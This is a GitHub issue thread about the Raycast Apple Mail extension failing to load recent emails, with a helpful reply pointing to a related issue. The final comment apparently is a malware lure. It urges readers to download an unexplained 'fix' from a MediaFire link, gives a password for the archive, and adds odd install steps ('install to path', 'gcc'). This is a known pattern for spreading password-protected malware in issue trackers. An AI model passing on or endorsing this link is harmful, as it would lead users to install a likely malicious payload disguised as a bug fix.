### ISSUE TITLE
[Apple Mail] ... Not loading emails - failed to fetch

### ISSUE THREAD

**Issue by uzairansaruzi** [raycast/extensions#14209]
### Extension

https://www.raycast.com/yug2005/mail

### Raycast Version

1.81.2

### macOS Version

14.6.1

### Description

When trying to load emails, getting an error that reads, "Could not get recent messages"

<img width="804" alt="Screenshot 2024-08-27 at 3 26 05 AM" src="https://github.com/user-attachments/assets/06a9a28d-ceff-49a9-ac4e-8da52976e762">

### Steps To Reproduce

1. Open Raycast
2. Run "See Recent Mail" command

**Comment by jfkisafk** [comment]
Hey @uzairansaruzi , can you please check if one of these resolve the issue: https://github.com/raycast/extensions/issues/14107#issuecomment-2299760447

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
